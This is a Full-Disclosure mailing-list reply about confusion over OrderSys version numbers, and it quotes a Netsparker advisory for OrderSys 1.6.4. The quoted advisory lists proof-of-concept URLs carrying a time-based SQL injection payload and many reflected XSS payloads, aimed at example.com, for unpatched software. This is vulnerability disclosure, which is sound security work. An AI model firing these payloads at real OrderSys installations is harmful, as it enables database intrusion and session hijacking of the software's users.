Re: XSS and SQL Injection Vulnerabilities in OrderSys

[muuratsalo experimental hack lab <muuratsalo () gmail com>]

Dear all,
first of all thanks to Henri for pointing it out (on the LabWiki
discussion). I am trying to be as
clear as possible even if my English is really poor!

I have to say that the author answered to me every time in just one
hour and I had not any problem in contacting him.
He has been always very kind so it is quite difficult to me to believe
that he didn't answered to other researchers.

The only problem was that the author was updating all his softwares
(LabWiki, LabStoRe and OrderSys) *** WITHOUT*** changing the version
number. I asked him to do put the softwares offline but he didn't
wanted to follow my suggestion. The results were that there have been
online more than 20 different softwares with the same version number.I
can give evidence to it, the author can give evidence too.

I think that the researcher of Mavituna Security downloaded a version
on the website and just tested one alpha version under development.

I have to say that there was not any clear clarification of this so
they were absolutely right in testing what they believed to be the
current stable version.

Only after some weeks I have asked the author to point it out on the
website that all the softwares were under development due to security
issues and that's what he did.

Regards,
muuratsalo

2012/8/22 Netsparker Advisories <advisories () mavitunasecurity com>:
> Information
> --------------------
> Name :  XSS and SQL Injection Vulnerabilities in OrderSys
> Software :  OrderSys 1.6.4 and possibly below.
> Vendor Homepage :  http://www.bioinformatics.org/phplabware/labwiki/index.php
> Vulnerability Type :  Cross-Site Scripting and SQL Injection
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-007
>
> Description
> --------------------
> The OrderSys system was originally developed at an academic research
> laboratory to simplify the filling of order forms that could be
> printed for handing over to a departmental office which processed the
> orders. The details for items and vendors, and order histories, could
> be stored in tables of a MySQL database, thereby saving time and
> effort of looking up catalog numbers, price, etc., budgeting, order
> follow ups, and preventing unnecessary ordering as well as
> illegibilities inherent to handwritten ordering. The system can be
> easily used for other purposes.
>
> Details
> --------------------
> OrderSys is affected by XSS and SQL Injection vulnerabilities in version 1.6.4.
>
> Example PoC urls are as follows :
>
> SQL Injection Vulnerabilities
>
> http://example.com/ordering/items.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3
> http://example.com/ordering/vendors.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3&submit_find=Find
>
> XSS Vulnerabilities
>
> http://example.com/ordering/items.php?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0007B1)%3C/script%3E&where_condition=3&order_condition=name%20ASC
> http://example.com/ordering/vendors.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
> http://example.com/ordering/items.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
> http://example.com/ordering/orders.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
> http://example.com/ordering/interface_creator/index_short.php?table_name=item&function=details&where_field='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F1)%3C/script%3E&where_value=279
> http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F5B)%3C/script%3E&page=0&order=Name&order_type=DESC
> http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F79)%3C/script%3E&order=Name&order_type=DESC
> http://example.com/ordering/interface_creator/login.php?function='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F4)%3C/script%3E&go_to=(http%3A%2F%2Fubuntu%2Ftargets%2Fordersys%2Fordering%2Fadmin.php)
> http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000902)%3C/script%3E
> http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor
> http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor
> http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC
> http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC
>
> You can read the full article about Cross-Site Scripting and SQL
> Injection vulnerabilities from here :
>
> Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
> SQL Injection: http://www.mavitunasecurity.com/sql-injection/
>
> Solution
> --------------------
> No patch released.
>
> Advisory Timeline
> --------------------
> 15/11/2011 - First contact: No response
> 01/01/2012 - Second contact: No response
> 22/08/2012 - Advisory Released
>
> Credits
> --------------------
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
>
> References
> --------------------
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-ordersys/
> Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
>
> About Netsparker
> --------------------
> Netsparker® can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.
>
> --
> Netsparker Advisories, <advisories () mavitunasecurity com>
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/